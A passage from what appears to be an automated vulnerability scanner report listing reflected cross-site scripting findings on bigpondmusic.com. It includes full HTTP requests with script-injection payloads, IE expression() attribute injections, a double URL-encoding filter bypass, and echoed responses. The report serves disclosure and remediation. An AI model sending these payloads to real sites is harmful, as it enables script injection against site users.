User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:29:16 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 88099


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/albumc0385"><script>alert(1)</script>3e0a93acac3/paul-kelly/paul-kellys-greatest-hits-songs-from-the-south-volume-1-2" />
...[SNIP]...

2.120. http://bigpondmusic.com/album/paul-kelly/paul-kellys-greatest-hits-songs-from-the-south-volume-1-2 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://bigpondmusic.com
Path:   /album/paul-kelly/paul-kellys-greatest-hits-songs-from-the-south-volume-1-2

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4292b'%3b33844f2483 was submitted in the REST URL parameter 1. This input was echoed as 4292b';33844f2483 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /album4292b'%3b33844f2483/paul-kelly/paul-kellys-greatest-hits-songs-from-the-south-volume-1-2 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:29:19 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 88267


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
trabpmusicdev=localhost,testing.,staging.;telstraglobalprd,telstrabpbigpondprd,telstrabpmusicprd=bigpondmusic.com";
   s.prop1 = 'BP';
   s.prop2='Entertainment';
   s.prop3= 'Music';
   s.channel = 'album4292b';33844f2483';
   s.prop4 = 'paul-kelly';
   s.prop5 = 'paul-kellys-greatest-hits-songs-from-the-south-volume-1-2';
   
   s.pageName=s.prop1 + ':' + s.prop3 + ':' + s.channel + ':' + s.prop4 + '-' + s.prop5;
   
   s.h
...[SNIP]...

2.121. http://bigpondmusic.com/album/paul-kelly/paul-kellys-greatest-hits-songs-from-the-south-volume-1-2 [h parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /album/paul-kelly/paul-kellys-greatest-hits-songs-from-the-south-volume-1-2

Issue detail

The value of the h request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e427a"style%3d"x%3aexpression(alert(1))"fe0616ca712 was submitted in the h parameter. This input was echoed as e427a"style="x:expression(alert(1))"fe0616ca712 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /album/paul-kelly/paul-kellys-greatest-hits-songs-from-the-south-volume-1-2?h=767746704e427a"style%3d"x%3aexpression(alert(1))"fe0616ca712 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 23 Nov 2010 03:29:18 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 155057


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Paul Kelly - Paul Kelly's Gr
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/album/paul-kelly/paul-kellys-greatest-hits-songs-from-the-south-volume-1-2?h=767746704e427a"style="x:expression(alert(1))"fe0616ca712" />
...[SNIP]...

2.122. http://bigpondmusic.com/album/paul-kelly/paul-kellys-greatest-hits-songs-from-the-south-volume-1-2 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /album/paul-kelly/paul-kellys-greatest-hits-songs-from-the-south-volume-1-2

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 60d82"style%3d"x%3aexpression(alert(1))"e1280da1058 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 60d82"style="x:expression(alert(1))"e1280da1058 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /album/paul-kelly/paul-kellys-greatest-hits-songs-from-the-south-volume-1-2?60d82"style%3d"x%3aexpression(alert(1))"e1280da1058=1 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 23 Nov 2010 03:29:11 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 154937


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Paul Kelly - Paul Kelly's Gr
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/album/paul-kelly/paul-kellys-greatest-hits-songs-from-the-south-volume-1-2?60d82"style="x:expression(alert(1))"e1280da1058=1" />
...[SNIP]...

2.123. http://bigpondmusic.com/album/powderfinger/fingerprints-the-best-of-powderfinger-1994-2000 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /album/powderfinger/fingerprints-the-best-of-powderfinger-1994-2000

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fc80e%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e52b1405e7f was submitted in the REST URL parameter 1. This input was echoed as fc80e"><script>alert(1)</script>52b1405e7f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /albumfc80e%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e52b1405e7f/powderfinger/fingerprints-the-best-of-powderfinger-1994-2000 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:22:32 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 88042


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/albumfc80e"><script>alert(1)</script>52b1405e7f/powderfinger/fingerprints-the-best-of-powderfinger-1994-2000" />
...[SNIP]...

2.124. http://bigpondmusic.com/album/powderfinger/fingerprints-the-best-of-powderfinger-1994-2000 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://bigpondmusic.com
Path:   /album/powderfinger/fingerprints-the-best-of-powderfinger-1994-2000

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload aa9c1'%3b630504def5d was submitted in the REST URL parameter 1. This input was echoed as aa9c1';630504def5d in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /albumaa9c1'%3b630504def5d/powderfinger/fingerprints-the-best-of-powderfinger-1994-2000 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:22:35 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 88225


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
trabpmusicdev=localhost,testing.,staging.;telstraglobalprd,telstrabpbigpondprd,telstrabpmusicprd=bigpondmusic.com";
   s.prop1 = 'BP';
   s.prop2='Entertainment';
   s.prop3= 'Music';
   s.channel = 'albumaa9c1';630504def5d';
   s.prop4 = 'powderfinger';
   s.prop5 = 'fingerprints-the-best-of-powderfinger-1994-2000';
   
   s.pageName=s.prop1 + ':' + s.prop3 + ':' + s.channel + ':' + s.prop4 + '-' + s.prop5;
   
   s.hier1= s.
...[SNIP]...

2.125. http://bigpondmusic.com/album/powderfinger/fingerprints-the-best-of-powderfinger-1994-2000 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /album/powderfinger/fingerprints-the-best-of-powderfinger-1994-2000

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8a6a7"style%3d"x%3aexpression(alert(1))"e1cd885fe90 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 8a6a7"style="x:expression(alert(1))"e1cd885fe90 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /album/powderfinger/fingerprints-the-best-of-powderfinger-1994-2000?8a6a7"style%3d"x%3aexpression(alert(1))"e1cd885fe90=1 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 23 Nov 2010 03:22:12 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 130253


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Powderfinger - Fingerprints
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/album/powderfinger/fingerprints-the-best-of-powderfinger-1994-2000?8a6a7"style="x:expression(alert(1))"e1cd885fe90=1" />
...[SNIP]...

2.126. http://bigpondmusic.com/album/rascal-flatts/nothing-like-this [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /album/rascal-flatts/nothing-like-this

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9aa2b%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e40c385453a8 was submitted in the REST URL parameter 1. This input was echoed as 9aa2b"><script>alert(1)</script>40c385453a8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /album9aa2b%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e40c385453a8/rascal-flatts/nothing-like-this HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:19:10 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 88467


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/album9aa2b"><script>alert(1)</script>40c385453a8/rascal-flatts/nothing-like-this" />
...[SNIP]...

2.127. http://bigpondmusic.com/album/rascal-flatts/nothing-like-this [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://bigpondmusic.com
Path:   /album/rascal-flatts/nothing-like-this

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ab7f7'%3b75a2a29d0bb was submitted in the REST URL parameter 1. This input was echoed as ab7f7';75a2a29d0bb in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /albumab7f7'%3b75a2a29d0bb/rascal-flatts/nothing-like-this HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:19:19 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 87847


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
trabpmusicdev=localhost,testing.,staging.;telstraglobalprd,telstrabpbigpondprd,telstrabpmusicprd=bigpondmusic.com";
   s.prop1 = 'BP';
   s.prop2='Entertainment';
   s.prop3= 'Music';
   s.channel = 'albumab7f7';75a2a29d0bb';
   s.prop4 = 'rascal-flatts';
   s.prop5 = 'nothing-like-this';
   
   s.pageName=s.prop1 + ':' + s.prop3 + ':' + s.channel + ':' + s.prop4 + '-' + s.prop5;
   
   s.hier1= s.prop1+ '|' + s.prop2+ '|' + s
...[SNIP]...

2.128. http://bigpondmusic.com/album/rascal-flatts/nothing-like-this [h parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /album/rascal-flatts/nothing-like-this

Issue detail

The value of the h request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 69564"style%3d"x%3aexpression(alert(1))"a3c04abb6ce was submitted in the h parameter. This input was echoed as 69564"style="x:expression(alert(1))"a3c04abb6ce in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /album/rascal-flatts/nothing-like-this?h=76868968769564"style%3d"x%3aexpression(alert(1))"a3c04abb6ce HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 23 Nov 2010 03:18:46 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 121041


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Rascal Flatts - Nothing Like
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/album/rascal-flatts/nothing-like-this?h=76868968769564"style="x:expression(alert(1))"a3c04abb6ce" />
...[SNIP]...

2.129. http://bigpondmusic.com/album/rascal-flatts/nothing-like-this [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /album/rascal-flatts/nothing-like-this

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fb486"style%3d"x%3aexpression(alert(1))"1f6f0212f93 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as fb486"style="x:expression(alert(1))"1f6f0212f93 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /album/rascal-flatts/nothing-like-this?fb486"style%3d"x%3aexpression(alert(1))"1f6f0212f93=1 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 23 Nov 2010 03:18:52 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 121111


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Rascal Flatts - Nothing Like
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/album/rascal-flatts/nothing-like-this?fb486"style="x:expression(alert(1))"1f6f0212f93=1" />
...[SNIP]...

2.130. http://bigpondmusic.com/album/rihanna/loud6 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /album/rihanna/loud6

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c8e4f%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e35d45e20369 was submitted in the REST URL parameter 1. This input was echoed as c8e4f"><script>alert(1)</script>35d45e20369 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /albumc8e4f%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e35d45e20369/rihanna/loud6 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:21:37 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
